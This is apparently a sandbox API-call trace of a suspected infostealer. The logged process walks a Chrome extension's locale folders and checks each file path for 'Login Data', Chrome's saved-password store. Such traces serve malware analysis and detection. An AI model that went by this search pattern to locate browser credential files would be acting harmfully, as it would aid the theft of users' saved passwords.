lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl" [0161.622] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\" [0161.622] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\") returned 138 [0161.622] lstrlenW (lpString="messages.json") returned 13 [0161.622] GetProcessHeap () returned 0x8e0000 [0161.622] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.622] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\" [0161.622] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json" [0161.622] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.623] GetProcessHeap () returned 0x8e0000 [0161.623] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.623] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sl\\messages.json", lpSrch="Login Data") returned 0x0 [0161.623] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.623] GetProcessHeap () returned 0x8e0000 [0161.623] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.623] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85add150, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdf, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.623] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.623] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.623] GetProcessHeap () returned 0x8e0000 [0161.623] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.623] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.623] GetProcessHeap () returned 0x8e0000 [0161.623] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.623] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="sr", cAlternateFileName="")) returned 1 [0161.623] lstrcmpiW (lpString1="sr", lpString2=".") returned 1 [0161.623] lstrcmpiW (lpString1="sr", lpString2="..") returned 1 [0161.623] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.623] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.623] lstrlenW (lpString="\\") returned 1 [0161.623] GetProcessHeap () returned 0x8e0000 [0161.623] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.623] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.623] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.623] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.623] lstrlenW (lpString="sr") returned 2 [0161.623] GetProcessHeap () returned 0x8e0000 [0161.623] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.623] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.623] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr" [0161.623] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.623] GetProcessHeap () returned 0x8e0000 [0161.623] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.624] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr") returned 137 [0161.624] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr") returned 137 [0161.624] lstrlenW (lpString="\\*.*") returned 4 [0161.624] GetProcessHeap () returned 0x8e0000 [0161.624] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.624] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr" [0161.624] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\*.*" [0161.624] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.624] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.624] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.624] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.624] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.624] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.624] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr") returned 137 [0161.624] lstrlenW (lpString="\\") returned 1 [0161.624] GetProcessHeap () returned 0x8e0000 [0161.624] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.624] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr" [0161.624] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\" [0161.624] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\") returned 138 [0161.624] lstrlenW (lpString="messages.json") returned 13 [0161.624] GetProcessHeap () returned 0x8e0000 [0161.624] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.624] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\" [0161.625] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" [0161.625] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.625] GetProcessHeap () returned 0x8e0000 [0161.625] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.625] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json", lpSrch="Login Data") returned 0x0 [0161.625] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.625] GetProcessHeap () returned 0x8e0000 [0161.625] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.625] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.625] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.625] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.625] GetProcessHeap () returned 0x8e0000 [0161.625] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.625] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.625] GetProcessHeap () returned 0x8e0000 [0161.625] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.625] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="sv", cAlternateFileName="")) returned 1 [0161.625] lstrcmpiW (lpString1="sv", lpString2=".") returned 1 [0161.625] lstrcmpiW (lpString1="sv", lpString2="..") returned 1 [0161.625] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.625] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.625] lstrlenW (lpString="\\") returned 1 [0161.625] GetProcessHeap () returned 0x8e0000 [0161.625] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.625] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.625] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.625] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.625] lstrlenW (lpString="sv") returned 2 [0161.625] GetProcessHeap () returned 0x8e0000 [0161.625] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.625] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.625] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="sv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv" [0161.625] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.626] GetProcessHeap () returned 0x8e0000 [0161.626] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.626] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv") returned 137 [0161.626] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv") returned 137 [0161.626] lstrlenW (lpString="\\*.*") returned 4 [0161.626] GetProcessHeap () returned 0x8e0000 [0161.626] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.626] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv" [0161.626] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\*.*" [0161.626] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, 